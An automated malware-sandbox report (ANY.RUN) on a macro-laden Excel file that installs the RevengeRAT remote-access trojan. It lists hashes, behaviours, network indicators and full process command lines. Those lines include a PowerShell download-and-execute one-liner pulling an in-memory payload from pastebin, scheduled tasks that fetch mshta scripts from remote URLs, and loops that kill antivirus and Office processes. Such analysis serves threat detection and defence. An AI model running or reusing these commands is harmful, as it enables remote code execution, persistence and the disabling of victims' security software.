analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Pictures.SLLC Samples.xls

Full analysis: https://app.any.run/tasks/5d703aa2-8f09-407c-bd2b-c3ad086a8825
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: January 22, 2019, 12:20:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
revenge
maldoc-19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 17 18:45:31 2019, Security: 0
MD5:

C40391DE6144B5E1CCBEF7F0E985D70C

SHA1:

2E8372C22C3581D07BCE7697495B65B7F2E43E6E

SHA256:

6B839EA4B13B2A974E62FD87443A8D0C379A7E87493FB71916ECC99C2EA28D52

SSDEEP:

768:SgwfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAKb4Hv55lqF4hLLD1LsAukYD0:GfZ+RwPONXoRjDhIcp0fDlaGGx+cL26D

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2692)
    • Changes settings of System certificates

      • mshta.exe (PID: 3212)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2692)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 3212)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2196)
      • schtasks.exe (PID: 2988)
    • REVENGE was detected

      • powershell.exe (PID: 2396)
    • Connects to CnC server

      • powershell.exe (PID: 2396)
  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3212)
    • Creates files in the user directory

      • mshta.exe (PID: 3212)
      • powershell.exe (PID: 2396)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3212)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3008)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3008)
      • forfiles.exe (PID: 3056)
      • forfiles.exe (PID: 2840)
      • forfiles.exe (PID: 684)
      • forfiles.exe (PID: 4060)
      • forfiles.exe (PID: 2292)
      • forfiles.exe (PID: 3460)
      • forfiles.exe (PID: 3860)
      • forfiles.exe (PID: 3956)
      • forfiles.exe (PID: 2576)
      • forfiles.exe (PID: 2624)
      • forfiles.exe (PID: 3724)
      • forfiles.exe (PID: 3548)
      • forfiles.exe (PID: 2788)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 3784)
    • Connects to unusual port

      • powershell.exe (PID: 2396)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3212)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2692)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2006:09:16 00:00:00
ModifyDate: 2019:01:17 18:45:31
Security: None
CodePage: Windows Latin 1 (Western European)
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Worksheets
  • 3
CompObjUserTypeLen: 38
CompObjUserType: Microsoft Office Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
191
Monitored processes
155
Malicious processes
17
Suspicious processes
3

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs forfiles.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs #REVENGE powershell.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2692"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
3212mshta http://bit.ly/SusuMuliC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2196"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://b67x.blogspot.com/p/blog-page.html\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2664"C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2964"C:\Windows\System32\cmd.exe" /C forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2988"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 10 /tn "MS-OFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/urGHE2PF\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3008"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2840forfiles /c "taskkill /f /im AvastUi.exe" C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3784forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3864taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 355
Read events
1 168
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
11
Unknown types
1

Dropped files

PID
Process
Filename
Type
2692EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8708.tmp.cvr
MD5:
SHA256:
3212mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\error[1]
MD5:
SHA256:
3212mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\warning[1]
MD5:
SHA256:
2396powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EO8EXB8548AT2BULOHXM.temp
MD5:
SHA256:
2692EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFE6B2C417CF67FD46.TMP
MD5:
SHA256:
3212mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:37D197EF5BB2D5AEC5D110A6649B44E2
SHA256:7E8F4164E8FE7F3949B9BEBE1D1D8FE878D376A6E3DB9239DF9DE98ED977298B
2396powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a1a5.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3212mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\864213505-ieretrofit[1].jstext
MD5:364501E083769DD2522BD01655BF399D
SHA256:0C20A9CE611E3EE5B32F6FF83F04D64EC7CFE867139AD51AA4E4AF210E1C9832
2396powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3212mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\2727757643-css_bundle_v2[1].csstext
MD5:C6BEF00B7471799FB84ECD3C7D93B889
SHA256:797E19AC51BD552CB84849B171FAD7CF0563B4A14BDC3F751D1EDAC71064FF56
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
9
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3212
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/SusuMuli
US
html
122 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3212
mshta.exe
172.217.16.201:443
www.blogger.com
Google Inc.
US
whitelisted
3212
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
3212
mshta.exe
172.217.22.65:443
b67x.blogspot.com
Google Inc.
US
whitelisted
2396
powershell.exe
102.165.38.126:2336
jordanchen7361.sytes.net
malicious
2396
powershell.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
b67x.blogspot.com
  • 172.217.22.65
whitelisted
www.blogger.com
  • 172.217.16.201
shared
resources.blogblog.com
  • 172.217.16.201
whitelisted
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
jordanchen736.sytes.net
  • 0.0.0.0
malicious
jordanchen7361.sytes.net
  • 102.165.38.126
malicious

Threats

PID
Process
Class
Message
3212
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
2396
powershell.exe
A Network Trojan was detected
SC BACKDOOR Backdoor RevengeRAT Win32
2396
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2396
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
2396
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
11 ETPRO signatures available at the full report
No debug info